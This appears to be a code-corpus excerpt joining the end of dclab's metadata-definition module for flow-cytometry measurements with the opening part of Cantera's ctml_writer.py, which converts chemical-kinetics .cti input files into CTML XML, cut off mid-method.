# present. If a channel is not used, the channel name *must not*
# be present. E.g. if only channels 1 and 2 are used, but there
# are three channels present, then `channel count` is two,
# `channels installed` is three, and `channel 3 name` is not set.
["channel 1 name", str, "FL1 description"],
["channel 2 name", str, "FL2 description"],
["channel 3 name", str, "FL3 description"],
["channel count", fint, "Number of active channels"],
["channels installed", fint, "Number of available channels"],
# In contrast to `channel ? name`, the laser power *may*
# be present (but must be set to 0), if a laser line is not used.
["laser 1 lambda", float, "Laser 1 wavelength [nm]"],
["laser 1 power", float, "Laser 1 output power [%]"],
["laser 2 lambda", float, "Laser 2 wavelength [nm]"],
["laser 2 power", float, "Laser 2 output power [%]"],
["laser 3 lambda", float, "Laser 3 wavelength [nm]"],
["laser 3 power", float, "Laser 3 output power [%]"],
["laser count", fint, "Number of active lasers"],
["lasers installed", fint, "Number of available lasers"],
["sample rate", fint, "Trace sample rate [Hz]"],
["samples per event", fint, "Samples per event"],
["signal max", float, "Upper voltage detection limit [V]"],
["signal min", float, "Lower voltage detection limit [V]"],
["trace median", fint, "Rolling median filter size for traces"],
],
# All tdms-related parameters
"fmt_tdms": [
["video frame offset", fint, "Missing events at beginning of video"],
],
# All imaging-related keywords
"imaging": [
["flash device", str, "Light source device type"], # e.g. green LED
["flash duration", float, "Light source flash duration [µs]"],
["frame rate", float, "Imaging frame rate [Hz]"],
["pixel size", float, "Pixel size [µm]"],
["roi position x", fint, "Image x coordinate on sensor [px]"],
["roi position y", fint, "Image y coordinate on sensor [px]"],
["roi size x", fint, "Image width [px]"],
["roi size y", fint, "Image height [px]"],
],
# All parameters for online contour extraction from the event images
"online_contour": [
# The option "bg empty" was introduced in dclab 0.34.0 and
# Shape-In 2.2.2.5.
# Shape-In writes to the "shapein-warning" log if there are
# frames with event images (non-empty frames) that had to be
# used for background correction.
["bg empty", fbool, "Background correction from empty frames only"],
["bin area min", fint, "Minium pixel area of binary image event"],
["bin kernel", fint, "Odd ellipse kernel size, binary image morphing"],
["bin threshold", fint, "Binary threshold for avg-bg-corrected image"],
["image blur", fint, "Odd sigma for Gaussian blur (21x21 kernel)"],
["no absdiff", fbool, "Avoid OpenCV 'absdiff' for avg-bg-correction"],
],
# All online-filter-related keywords (box filters, soft limit, and
# polygons are handled in `meta_logic`)
"online_filter": [
# "target*" is only set if measurement is stopped automatically.
# "target*" is not necessarily reached (e.g. user aborted).
["target duration", float, "Target measurement duration [min]"],
["target event count", fint, "Target event count for online gating"],
],
# All setup-related keywords, except imaging
"setup": [
["channel width", float, "Width of microfluidic channel [µm]"],
["chip identifier", lcstr, "Unique identifier of the chip used"],
["chip region", lcstr, "Imaged chip region (channel or reservoir)"],
["flow rate", float, "Flow rate in channel [µL/s]"],
["flow rate sample", float, "Sample flow rate [µL/s]"],
["flow rate sheath", float, "Sheath flow rate [µL/s]"],
["identifier", str, "Unique setup identifier"],
# "medium" is one of CellCarrier, CellCarrierB, water, or other
["medium", str, "Medium used"],
["module composition", str, "Comma-separated list of modules used"],
["software version", str, "Acquisition software with version"],
["temperature", float, "Mean chip temperature [°C]"],
],
}
# CFG convenience lists and dicts
_cfg = copy.deepcopy(CFG_METADATA)
_cfg.update(CFG_ANALYSIS)
#: dict with metadata description
config_descr = {}
for _key in _cfg:
config_descr[_key] = {}
for _subkey, __, _descr in _cfg[_key]:
config_descr[_key][_subkey] = _descr
#: dict of dicts containing functions to convert input data
config_funcs = {}
for _key in _cfg:
config_funcs[_key] = {}
for _subkey, _type, __ in _cfg[_key]:
config_funcs[_key][_subkey] = _type
#: dict with section as keys and config parameter names as values
config_keys = {}
for _key in _cfg:
config_keys[_key] = [it[0] for it in _cfg[_key]]
#: dict of dicts containing the type of section parameters
config_types = {}
for _key in _cfg:
config_types[_key] = {}
for _subkey, _type, __ in _cfg[_key]:
if _type in func_types:
_type = func_types[_type]
config_types[_key][_subkey] = _type
|
ZellMechanik-Dresden/dclab
|
dclab/definitions/meta_const.py
|
Python
|
gpl-2.0
| 8,424
|
[
"Gaussian"
] |
2ee091a6608c1723682c4243c57c991e67ee5f36bbfbb033b9a55ebd5a8c0ff1
|
#!/usr/bin/env python
##
# @file ctml_writer.py
#
# Cantera .cti input file processor
# @defgroup pygroup Cantera Python Interface
#
# The functions and classes in this module process Cantera .cti input
# files and produce CTML files. It can be imported as a module, or used
# as a script.
#
# script usage:
#
# python ctml_writer.py infile.cti
#
# This will produce CTML file 'infile.xml'
from __future__ import print_function
import sys
def _printerr(*args):
# All debug and error output should go to stderr
print(*args, file=sys.stderr)
class CTI_Error(Exception):
"""Exception raised if an error is encountered while
parsing the input file.
@ingroup pygroup"""
def __init__(self, msg):
_printerr('\n\n***** Error parsing input file *****\n\n')
_printerr(msg)
_printerr()
indent = ['',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ',
' ']
#-----------------------------------------------------
class XMLnode(object):
"""This is a minimal class to allow easy creation of an XML tree
from Python. It can write XML, but cannot read it."""
__slots__ = ('_name', '_value', '_attribs', '_children', '_childmap')
def __init__(self, name="--", value = ""):
"""Create a new node. Usually this only needs to be explicitly
called to create the root element. Method addChild calls this
constructor to create the new child node."""
self._name = name
# convert 'value' to a string if it is not already, and
# strip leading whitespace
if not isinstance(value, str):
self._value = repr(value).lstrip()
else:
self._value = value.lstrip()
self._attribs = {} # dictionary of attributes
self._children = [] # list of child nodes
self._childmap = {} # dictionary of child nodes
def name(self):
"""The tag name of the node."""
return self._name
def nChildren(self):
"""Number of child elements."""
return len(self._children)
def addChild(self, name, value=""):
"""Add a child with tag 'name', and set its value if the value
parameter is supplied."""
# create a new node for the child
c = XMLnode(name = name, value = value)
# add it to the list of children, and to the dictionary
# of children
self._children.append(c)
self._childmap[name] = c
return c
def addComment(self, comment):
"""Add a comment."""
self.addChild(name = '_comment_', value = comment)
def value(self):
"""A string containing the element value."""
return self._value
def child(self, name=""):
"""The child node with specified name."""
return self._childmap[name]
def children(self):
""" An iterator over the child nodes """
for c in self._children:
yield c
def __getitem__(self, key):
"""Get an attribute using the syntax node[key]"""
return self._attribs[key]
def __setitem__(self, key, value):
"""Set a new attribute using the syntax node[key] = value."""
self._attribs[key] = value
def __call__(self):
"""Allows getting the value using the syntax 'node()'"""
return self._value
def write(self, filename):
"""Write out the XML tree to a file."""
s = ['<?xml version="1.0"?>\n']
self._write(s, 0)
s.append('\n')
if isinstance(filename, str):
with open(filename, 'w') as f:
f.write(''.join(s))
else:
filename.write(''.join(s))
def write_comment(self, s, level):
s.append('\n'+indent[level]+'<!--')
value = self._value
if value:
if value[0] != ' ':
value = ' '+value
if value[-1] != ' ':
value += ' '
s.append(value+'-->')
def write_attribs(self, s):
for a in self._attribs:
s.append(' '+a+'="'+self._attribs[a]+'"')
def write_value(self, s, level):
indnt = indent[level]
vv = self._value.lstrip()
ieol = vv.find('\n')
if ieol >= 0:
while True:
ieol = vv.find('\n')
if ieol >= 0:
s.extend(('\n ', indnt, vv[:ieol]))
vv = vv[ieol+1:].lstrip()
else:
s.extend(('\n ',indnt,vv))
break
else:
s.append(self._value)
def _write(self, s, level = 0):
"""Internal method used to write the XML representation of each node."""
if not self.name:
return
# handle comments
if self._name == '_comment_':
self.write_comment(s, level)
return
indnt = indent[level]
# write the opening tag and attributes
s.extend((indnt, '<', self._name))
self.write_attribs(s)
if not self._value and not self._children:
s.append('/>')
else:
s.append('>')
if self._value:
self.write_value(s, level)
for c in self._children:
s.append('\n')
c._write(s, level + 2)
if self._children:
s.extend(('\n', indnt))
s.extend(('</', self._name, '>'))
#--------------------------------------------------
# constants that can be used in .cti files
OneAtm = 1.01325e5
OneBar = 1.0e5
# Conversion from eV to J/kmol (electronCharge * Navrog)
eV = 9.64853364595687e7
# Electron Mass in kg
ElectronMass = 9.10938291e-31
import math, copy
# default units
_ulen = 'm'
_umol = 'kmol'
_umass = 'kg'
_utime = 's'
_ue = 'J/kmol'
_uenergy = 'J'
_upres = 'Pa'
# used to convert reaction pre-exponentials
_length = {'cm':0.01, 'm':1.0, 'mm':0.001}
_moles = {'kmol':1.0, 'mol':0.001, 'molec':1.0/6.02214129e26}
_time = {'s':1.0, 'min':60.0, 'hr':3600.0}
# default std state pressure
_pref = 1.0e5 # 1 bar
_name = 'noname'
# these lists store top-level entries
_elements = []
_species = []
_speciesnames = []
_phases = []
_reactions = []
_atw = {}
_enames = {}
_valsp = ''
_valrxn = ''
_valexport = ''
_valfmt = ''
def export_species(filename, fmt = 'CSV'):
global _valexport
global _valfmt
_valexport = filename
_valfmt = fmt
def validate(species = 'yes', reactions = 'yes'):
"""
Enable or disable validation of species and reactions.
:param species:
Set to ``'yes'`` (default) or ``'no'``.
:param reactions:
Set to ``'yes'`` (default) or ``'no'``. This controls duplicate reaction checks
and validation of rate expressions for some reaction types.
"""
global _valsp
global _valrxn
_valsp = species
_valrxn = reactions
def isnum(a):
"""True if a is an integer or floating-point number."""
if isinstance(a, (int, float)):
return 1
else:
return 0
def is_local_species(name):
"""true if the species named 'name' is defined in this file"""
if name in _speciesnames:
return 1
return 0
def dataset(nm):
"Set the dataset name. Invoke this to change the name of the XML file."
global _name
_name = nm
def standard_pressure(p0):
"""Set the default standard-state pressure."""
global _pref
_pref = p0
def units(length = '', quantity = '', mass = '', time = '',
act_energy = '', energy = '', pressure = ''):
"""
Set the default units.
:param length:
The default units for length. Default: ``'m'``
:param mass:
The default units for mass. Default: ``'kg'``
:param quantity:
The default units to specify number of molecules. Default: ``'kmol'``
:param time:
The default units for time. Default: ``'s'``
:param energy:
The default units for energies. Default: ``'J'``
:param act_energy:
The default units for activation energies. Default: ``'K'``
:param pressure:
The default units for pressure. Default: ``'Pa'``
"""
global _ulen, _umol, _ue, _utime, _umass, _uenergy, _upres
if length: _ulen = length
if quantity: _umol = quantity
if act_energy: _ue = act_energy
if time: _utime = time
if mass: _umass = mass
if energy: _uenergy = energy
if pressure: _upres = pressure
def ufmt(base, n):
"""return a string representing a unit to a power n."""
if n == 0: return ''
if n == 1: return '-'+base
if n == -1: return '/'+base
if n > 0: return '-'+base+str(n)
if n < 0: return '/'+base+str(-n)
def write(outName=None):
"""write the CTML file."""
x = XMLnode("ctml")
v = x.addChild("validate")
v["species"] = _valsp
v["reactions"] = _valrxn
if _elements:
ed = x.addChild("elementData")
for e in _elements:
e.build(ed)
for ph in _phases:
ph.build(x)
s = species_set(name = _name, species = _species)
s.build(x)
r = x.addChild('reactionData')
r['id'] = 'reaction_data'
for rx in _reactions:
rx.build(r)
if outName == 'STDOUT':
x.write(sys.stdout)
elif outName is not None:
x.write(outName)
elif _name != 'noname':
x.write(_name+'.xml')
else:
print(x)
if _valexport:
f = open(_valexport,'w')
for s in _species:
s.export(f, _valfmt)
f.close()
def addFloat(x, nm, val, fmt='', defunits=''):
"""
Add a child element to XML element x representing a
floating-point number.
"""
u = ''
s = ''
if isnum(val):
fval = float(val)
if fmt:
s = fmt % fval
else:
s = repr(fval)
xc = x.addChild(nm, s)
if defunits:
xc['units'] = defunits
else:
v = val[0]
u = val[1]
if fmt:
s = fmt % v
else:
s = repr(v)
xc = x.addChild(nm, s)
xc['units'] = u
def getAtomicComp(atoms):
if isinstance(atoms, dict): return atoms
a = atoms.replace(',',' ')
toks = a.split()
d = {}
for t in toks:
b = t.split(':')
try:
d[b[0]] = int(b[1])
except ValueError:
d[b[0]] = float(b[1])
return d
def getReactionSpecies(s):
"""Take a reaction string and return a
dictionary mapping species names to stoichiometric
coefficients. If any species appears more than once,
the returned stoichiometric coefficient is the sum.
>>> s = 'CH3 + 3 H + 5.2 O2 + 0.7 H'
>>> getReactionSpecies(s)
>>> {'CH3':1, 'H':3.7, 'O2':5.2}
"""
# Normalize formatting of falloff third bodies so that there is always a
# space following the '+', e.g. '(+M)' -> '(+ M)'
s = s.replace(' (+', ' (+ ')
# get rid of the '+' signs separating species. Only plus signs
# surrounded by spaces are replaced, so that plus signs may be
# used in species names (e.g. 'Ar3+')
toks = s.replace(' + ',' ').split()
d = {}
n = 1.0
for t in toks:
# try to convert the token to a number.
try:
n = float(t)
if n < 0.0:
raise CTI_Error("negative stoichiometric coefficient:"
+s)
#if t > '0' and t < '9':
# n = int(t)
#else:
# token isn't a number, so it must be a species name
except:
# already seen this token so increment its value by the last
# value of n
if t in d:
d[t] += n
else:
# first time this token has been seen, so set its value to n
d[t] = n
# reset n to 1.0 for species that do not specify a stoichiometric
# coefficient
n = 1
return d
class element(object):
""" An atomic element or isotope. """
def __init__(self, symbol = '',
atomic_mass = 0.01,
atomic_number = 0):
"""
:param symbol:
The symbol for the element or isotope.
:param atomic_mass:
The atomic mass in amu.
"""
self._sym = symbol
self._atw = atomic_mass
self._num = atomic_number
global _elements
_elements.append(self)
def build(self, db):
e = db.addChild("element")
e["name"] = self._sym
e["atomicWt"] = repr(self._atw)
e["atomicNumber"] = repr(self._num)
class species_set(object):
def __init__(self, name = '', species = []):
self._s = species
self._name = name
#self.type = SPECIES_SET
def build(self, p):
p.addComment(' species definitions ')
sd = p.addChild("speciesData")
sd["id"] = "species_data"
for s in self._s:
#if s.type == SPECIES:
s.build(sd)
#else:
# raise 'wrong object type in species_set: '+s.__class__
class species(object):
"""A constituent of a phase or interface."""
def __init__(self,
name = 'missing name!',
atoms = '',
note = '',
thermo = None,
transport = None,
charge = -999,
size = 1.0):
"""
:param name:
The species name (or formula). The name may be arbitrarily long,
although usually a relatively short, abbreviated name is most
convenient. Required parameter.
:param atoms:
The atomic composition, specified by a string containing
space-delimited <element>:<atoms> pairs. The number of atoms may be
either an integer or a floating-point number.
:param note:
A user-defined comment. Not evaluated by Cantera itself.
:param thermo:
The parameterization to use to compute the reference-state
thermodynamic properties. This must be one of the entry types
described in :ref:`sec-thermo-models`. To specify multiple
parameterizations, each for a different temperature range,
group them in parentheses.
:param transport:
An entry specifying parameters to compute this species'
contribution to the transport properties. This must be one of the
entry types described in :ref:`sec-species-transport-models`, and
must be consistent with the transport model of the phase into which
the species is imported. To specify parameters for multiple
transport models, group the entries in parentheses.
:param size:
The species "size". Currently used only for surface species,
where it represents the number of sites occupied.
:param charge:
The charge, in multiples of :math:`|e|`. If not specified, the
charge will be calculated from the number of "atoms" of element
``E``, which represents an electron.
"""
self._name = name
self._atoms = getAtomicComp(atoms)
self._comment = note
if thermo:
self._thermo = thermo
else:
self._thermo = const_cp()
self._transport = transport
chrg = 0
self._charge = charge
if 'E' in self._atoms:
chrg = -self._atoms['E']
if self._charge != -999:
if self._charge != chrg:
raise CTI_Error('specified charge inconsistent with number of electrons')
else:
self._charge = chrg
self._size = size
global _species
global _enames
_species.append(self)
global _speciesnames
if name in _speciesnames:
raise CTI_Error('species '+name+' multiply defined.')
_speciesnames.append(name)
for e in self._atoms.keys():
_enames[e] = 1
def export(self, f, fmt = 'CSV'):
global _enames
if fmt == 'CSV':
s = self._name+','
for e in _enames:
if e in self._atoms:
s += repr(self._atoms[e])+','
else:
s += '0,'
f.write(s)
if isinstance(self._thermo, thermo):
self._thermo.export(f, fmt)
else:
nt = len(self._thermo)
for n in range(nt):
self._thermo[n].export(f, fmt)
f.write('\n')
def build(self, p):
hdr = ' species '+self._name+' '
p.addComment(hdr)
s = p.addChild("species")
s["name"] = self._name
a = ''
for e in self._atoms.keys():
a += e+':'+str(self._atoms[e])+' '
s.addChild("atomArray",a)
if self._comment:
s.addChild("note",self._comment)
if self._charge != -999:
s.addChild("charge",self._charge)
if self._size != 1.0:
s.addChild("size",self._size)
if self._thermo:
t = s.addChild("thermo")
if isinstance(self._thermo, thermo):
self._thermo.build(t)
else:
nt = len(self._thermo)
for n in range(nt):
self._thermo[n].build(t)
if self._transport:
t = s.addChild("transport")
if isinstance(self._transport, transport):
self._transport.build(t)
else:
nt = len(self._transport)
for n in range(nt):
self._transport[n].build(t)
class thermo(object):
"""Base class for species standard-state thermodynamic properties."""
def _build(self, p):
return p.addChild("thermo")
def export(self, f, fmt = 'CSV'):
pass
class Mu0_table(thermo):
"""Properties are computed by specifying a table of standard
chemical potentials vs. T."""
def __init__(self, Trange = (0.0, 0.0),
h298 = 0.0,
mu0 = None,
p0 = -1.0):
self._t = Trange
self._h298 = h298
self._mu0 = mu0
self._pref = p0
def build(self, t):
n = t.addChild("Mu0")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
energy_units = _uenergy+'/'+_umol
addFloat(n,"H298", self._h298, defunits = energy_units)
n.addChild("numPoints", len(self._mu0))
mustr = ''
tstr = ''
col = 0
for v in self._mu0:
mu0 = v[1]
t = v[0]
tstr += '%17.9E, ' % t
mustr += '%17.9E, ' % mu0
col += 1
if col == 3:
tstr = tstr[:-2]+'\n'
mustr = mustr[:-2]+'\n'
col = 0
u = n.addChild("floatArray", mustr)
u["size"] = "numPoints"
u["name"] = "Mu0Values"
u = n.addChild("floatArray", tstr)
u["size"] = "numPoints"
u["name"] = "Mu0Temperatures"
class NASA(thermo):
"""The 7-coefficient NASA polynomial parameterization."""
def __init__(self, Trange = (0.0, 0.0), coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required.
:param coeffs:
List of seven coefficients :math:`(a_0, \ldots , a_6)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value is used, which is set by the ``standard_pressure``
directive.
"""
self._t = Trange
self._pref = p0
if len(coeffs) != 7:
raise CTI_Error('NASA coefficient list must have length = 7')
self._coeffs = coeffs
def export(self, f, fmt='CSV'):
if fmt == 'CSV':
s = 'NASA,'+str(self._t[0])+','+str(self._t[1])+','
for i in range(7):
s += '%17.9E, ' % self._coeffs[i]
f.write(s)
def build(self, t):
n = t.addChild("NASA")
n['Tmin'] = repr(self._t[0])
#n['Tmid'] = repr(self._t[1])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E' % (self._coeffs[4],
self._coeffs[5], self._coeffs[6])
#if i > 0 and 3*((i+1)/3) == i: s += '\n'
#s = s[:-2]
u = n.addChild("floatArray", s)
u["size"] = "7"
u["name"] = "coeffs"
class NASA9(thermo):
"""NASA9 polynomial parameterization for a single temperature region."""
def __init__(self, Trange = (0.0, 0.0),
coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required.
:param coeffs:
List of nine coefficients :math:`(a_0, \ldots , a_8)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value is used, which is set by the ``standard_pressure``
directive.
"""
self._t = Trange # Range of the polynomial representation
self._pref = p0 # Reference pressure
if len(coeffs) != 9:
raise CTI_Error('NASA9 coefficient list must have length = 9')
self._coeffs = coeffs
def export(self, f, fmt='CSV'):
if fmt == 'CSV':
s = 'NASA9,'+str(self._t[0])+','+str(self._t[1])+','
for i in range(9):
s += '%17.9E, ' % self._coeffs[i]
f.write(s)
def build(self, t):
n = t.addChild("NASA9")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E, %17.9E,' % (self._coeffs[4], self._coeffs[5],
self._coeffs[6], self._coeffs[7])
s += '\n'
s += '%17.9E' % (self._coeffs[8])
u = n.addChild("floatArray", s)
u["size"] = "9"
u["name"] = "coeffs"
class activityCoefficients(object):
pass
class pureFluidParameters(activityCoefficients):
"""
"""
def __init__(self, species = None, a_coeff = [], b_coeff = 0):
"""
"""
self._species = species
self._acoeff = a_coeff
self._bcoeff = b_coeff
def build(self,a):
f= a.addChild("pureFluidParameters")
f['species'] = self._species
s = '%10.4E, %10.4E \n' % (self._acoeff[0], self._acoeff[1])
ac = f.addChild("a_coeff",s)
ac["units"] = _upres+'-'+_ulen+'6/'+_umol+'2'
ac["model"] = "linear_a"
s = '%0.2f \n' % self._bcoeff
bc = f.addChild("b_coeff",s)
bc["units"] = _ulen+'3/'+_umol
class crossFluidParameters(activityCoefficients):
def __init__(self, species = None, a_coeff = [], b_coeff = []):
self._species1, self._species2 = species.split(' ')
self._acoeff = a_coeff
self._bcoeff = b_coeff
def build(self,a):
f= a.addChild("crossFluidParameters")
f["species2"] = self._species2
f["species1"] = self._species1
s = '%10.4E, %10.4E \n' % (self._acoeff[0], self._acoeff[1])
ac = f.addChild("a_coeff",s)
ac["units"] = _upres+'-'+_ulen+'6/'+_umol+'2'
ac["model"] = "linear_a"
if self._bcoeff:
s = '%0.2f \n' % self._bcoeff
bc = f.addChild("b_coeff",s)
bc["units"] = _ulen+'3/'+_umol
class Shomate(thermo):
"""Shomate polynomial parameterization."""
def __init__(self, Trange = (0.0, 0.0), coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required input.
:param coeffs:
Sequence of seven coefficients :math:`(A, \ldots ,G)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value set by the ``standard_pressure`` directive is used.
"""
self._t = Trange
self._pref = p0
if len(coeffs) != 7:
raise CTI_Error('Shomate coefficient list must have length = 7')
self._coeffs = coeffs
def build(self, t):
n = t.addChild("Shomate")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E' % (self._coeffs[4],
self._coeffs[5], self._coeffs[6])
u = n.addChild("floatArray", s)
u["size"] = "7"
u["name"] = "coeffs"
class Adsorbate(thermo):
"""Adsorbed species characterized by a binding energy and a set of
vibrational frequencies."""
def __init__(self, Trange = (0.0, 0.0),
binding_energy = 0.0,
frequencies = [], p0 = -1.0):
self._t = Trange
self._pref = p0
self._freqs = frequencies
self._be = binding_energy
def build(self, t):
n = t.addChild("adsorbate")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
energy_units = _uenergy+'/'+_umol
addFloat(n,'binding_energy',self._be, defunits = energy_units)
s = ""
nfreq = len(self._freqs)
for i in range(nfreq):
s += '%17.9E, ' % self._freqs[i]
s += '\n'
u = n.addChild("floatArray", s)
u["size"] = repr(nfreq)
u["name"] = "freqs"
class const_cp(thermo):
"""Constant specific heat."""
def __init__(self,
t0 = 298.15, cp0 = 0.0, h0 = 0.0, s0 = 0.0,
tmax = 5000.0, tmin = 100.0):
"""
:param t0:
Temperature parameter T0. Default: 298.15 K.
:param cp0:
Reference-state molar heat capacity (constant). Default: 0.0.
:param h0:
Reference-state molar enthalpy at temperature T0. Default: 0.0.
:param s0:
Reference-state molar entropy at temperature T0. Default: 0.0.
"""
self._t = [tmin, tmax]
self._c = [t0, h0, s0, cp0]
def build(self, t):
#t = self._build(p)
c = t.addChild('const_cp')
if self._t[0] >= 0.0: c['Tmin'] = repr(self._t[0])
if self._t[1] >= 0.0: c['Tmax'] = repr(self._t[1])
energy_units = _uenergy+'/'+_umol
addFloat(c,'t0',self._c[0], defunits = 'K')
addFloat(c,'h0',self._c[1], defunits = energy_units)
addFloat(c,'s0',self._c[2], defunits = energy_units+'/K')
addFloat(c,'cp0',self._c[3], defunits = energy_units+'/K')
class transport(object):
pass
class gas_transport(transport):
"""
Species-specific Transport coefficients for gas-phase transport models.
"""
def __init__(self, geom,
diam = 0.0, well_depth = 0.0, dipole = 0.0,
polar = 0.0, rot_relax = 0.0, acentric_factor = None):
"""
:param geom:
A string specifying the molecular geometry. One of ``atom``,
``linear``, or ``nonlinear``. Required.
:param diam:
The Lennard-Jones collision diameter in Angstroms. Required.
:param well_depth:
The Lennard-Jones well depth in Kelvin. Required.
:param dipole:
The permanent dipole moment in Debye. Default: 0.0
:param polar:
The polarizability in A^3. Default: 0.0
:param rot_relax:
The rotational relaxation collision number at 298 K. Dimensionless.
Default: 0.0
:param w_ac:
Pitzer's acentric factor. Dimensionless.
Default: 0.0
"""
self._geom = geom
self._diam = diam
self._well_depth = well_depth
self._dipole = dipole
self._polar = polar
self._rot_relax = rot_relax
self._w_ac = acentric_factor
def build(self, t):
#t = s.addChild("transport")
t['model'] = 'gas_transport'
# t.addChild("geometry", self._geom)
tg = t.addChild('string',self._geom)
tg['title'] = 'geometry'
addFloat(t, "LJ_welldepth", (self._well_depth, 'K'), '%8.3f')
addFloat(t, "LJ_diameter", (self._diam, 'A'),'%8.3f')
addFloat(t, "dipoleMoment", (self._dipole, 'Debye'),'%8.3f')
addFloat(t, "polarizability", (self._polar, 'A3'),'%8.3f')
addFloat(t, "rotRelax", self._rot_relax,'%8.3f')
if self._w_ac is not None:
addFloat(t, "acentric_factor", self._w_ac, '%8.3f')
class rate_expression(object):
pass
class Arrhenius(rate_expression):
def __init__(self,
A = 0.0,
b = 0.0,
E = 0.0,
coverage = []):
"""
:param A:
The pre-exponential coefficient. Required input. If entered without
units, the units will be computed considering all factors that
affect the units. The resulting units string is written to the CTML
file individually for each reaction pre-exponential coefficient.
:param b:
The temperature exponent. Dimensionless. Default: 0.0.
:param E:
Activation energy. Default: 0.0.
:param coverage: For a single coverage dependency, a list with four
elements: the species name followed by the three coverage
parameters. For multiple coverage dependencies, a list of lists
containing the individual sets of coverage parameters. Only used for
surface and edge reactions.
"""
self._c = [A, b, E]
if coverage:
if isinstance(coverage[0], str):
self._cov = [coverage]
else:
self._cov = coverage
for cov in self._cov:
if len(cov) != 4:
raise CTI_Error("Incorrect number of coverage parameters")
else:
self._cov = None
def build(self, p, name='', a=None):
if a is None:
a = p.addChild('Arrhenius')
if name:
a['name'] = name
# if a pure number is entered for A, multiply by the conversion
# factor to SI and write it to CTML as a pure number. Otherwise,
# pass it as-is through to CTML with the unit string.
if isnum(self._c[0]):
addFloat(a,'A',self._c[0]*self.unit_factor, fmt = '%14.6E')
elif len(self._c[0]) == 2 and self._c[0][1] == '/site':
addFloat(a,'A',self._c[0][0]/self.rxn_phase._sitedens,
fmt = '%14.6E')
else:
addFloat(a,'A',self._c[0], fmt = '%14.6E')
# The b coefficient should be dimensionless, so there is no
# need to use 'addFloat'
a.addChild('b', repr(self._c[1]))
# If a pure number is entered for the activation energy,
# add the default units, otherwise use the supplied units.
addFloat(a,'E', self._c[2], fmt = '%f', defunits = _ue)
# for surface reactions, a coverage dependence may be specified.
if self._cov:
for cov in self._cov:
c = a.addChild('coverage')
c['species'] = cov[0]
addFloat(c, 'a', cov[1], fmt = '%f')
c.addChild('m', repr(cov[2]))
addFloat(c, 'e', cov[3], fmt = '%f', defunits = _ue)
class stick(Arrhenius):
def build(self, p, name=''):
a = p.addChild('Arrhenius')
a['type'] = 'stick'
ngas = len(self.gas_species)
if ngas != 1:
raise CTI_Error("Sticking probabilities can only be used for "
"reactions with one gas-phase reactant, but this reaction has "
+ str(ngas) + ': ' + str(self.gas_species))
a['species'] = self.gas_species[0]
self.unit_factor = 1.0
Arrhenius.build(self, p, name, a)
def getPairs(s):
toks = s.split()
m = {}
for t in toks:
key, val = t.split(':')
m[key] = float(val)
return m
class reaction(object):
"""
A homogeneous chemical reaction with pressure-independent rate coefficient
and mass-action kinetics.
"""
def __init__(self,
equation = '',
kf = None,
id = '',
order = '',
options = []):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function :math:`A T^b exp(-E/\hat{R}T)`.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param order:
Override the default reaction orders implied by the reactant
stoichiometric coefficients. Given as a string of key:value pairs,
e.g. ``"CH4:0.25 O2:1.5"``.
:param options: Processing options, as described in
:ref:`sec-reaction-options`. May be one or more (as a list) of the
following: 'skip', 'duplicate', 'negative_A', 'negative_orders',
'nonreactant_orders'.
"""
self._id = id
self._e = equation
self._order = order
if isinstance(options, str):
self._options = [options]
else:
self._options = options
global _reactions
self._num = len(_reactions)+1
r = ''
p = ''
for e in ['<=>', '=>', '=']:
if self._e.find(e) >= 0:
r, p = self._e.split(e)
if e in ['<=>','=']: self.rev = 1
else: self.rev = 0
break
self._r = getReactionSpecies(r)
self._p = getReactionSpecies(p)
self._rxnorder = copy.copy(self._r)
if self._order:
order = getPairs(self._order)
for o in order.keys():
if o not in self._rxnorder and 'nonreactant_orders' not in self._options:
raise CTI_Error("order specified for non-reactant: "+o+" and no \'nonreactant_orders\' option given")
else:
self._rxnorder[o] = order[o]
self._kf = kf
self._igspecies = []
self._dims = [0]*4
self._rxnphase = None
self._type = ''
_reactions.append(self)
def unit_factor(self):
"""
Conversion factor from given rate constant units to the MKS (+kmol)
used internally by Cantera, taking into account the reaction order.
"""
return (math.pow(_length[_ulen], -self.ldim) *
math.pow(_moles[_umol], -self.mdim) / _time[_utime])
def build(self, p):
if self._id:
id = self._id
else:
id = '%04i' % self._num
self.mdim = 0
self.ldim = 0
rxnph = []
for s in self._r:
ns = self._rxnorder[s]
nm = -999
nl = -999
if _phases:
mindim = 4
for ph in _phases:
if ph.has_species(s):
nm, nl = ph.conc_dim()
if ph.is_ideal_gas():
self._igspecies.append(s)
if not ph in rxnph:
rxnph.append(ph)
self._dims[ph._dim] += 1
if ph._dim < mindim:
